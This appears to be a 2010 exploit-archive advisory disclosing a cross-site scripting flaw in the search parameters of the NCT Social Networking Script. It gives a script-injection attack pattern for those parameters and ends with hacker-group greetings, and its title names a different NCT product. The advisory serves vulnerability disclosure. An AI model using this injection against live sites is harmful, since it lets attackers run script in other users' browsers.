NCT Social Networking Script Cross Site Scripting

`# Exploit Title: XSS in NCT Jobs Portal Script  
# Date: 25-apr-2010  
# Author: Sid3^effects  
# Software Link: N/a  
# CVE : []  
# Code : []  
------------------------------------------------------------------------  
XSS in NCT Social Networking Script  
Vendor:http://www.ncrypted.net/  
----------------------Author:Sid3^effects-------------------------------  
  
  
Description :  
  
A modular, highly customizable social networking script  
  
With 100% copyright to you.  
  
NCT Social is a social utility script which provides rapid and high quality script for building custom web applications with deep integration for social networking features. If you think that the community could enhance the core valuation of your product, or if it's the community itself that you want to engage, go for NCT Social and get a modular, highly customizable social networking script.  
  
---------------------------------------------------------------------------  
  
* XSS (cross site scripting )   
  
XSS is also found in the search field (search.php=)  
  
Parameter Name: Keywords or Tags or Desired City  
Parameter Type: Querystring   
Attack Pattern: '"--><script>alert(0x000872)</script>   
  
---------------------------------------------------------------------------  
  
ShoutZ :  
-------   
---Indian Cyber warriors--Andhra hackers--   
  
Greetz :  
--------  
=--*L0rd ÇrusAdêr*---d4rk-blu™® [ICW]---R45C4L idi0th4ck3r---CR4C|< 008---M4n0j--Mayur--=  
`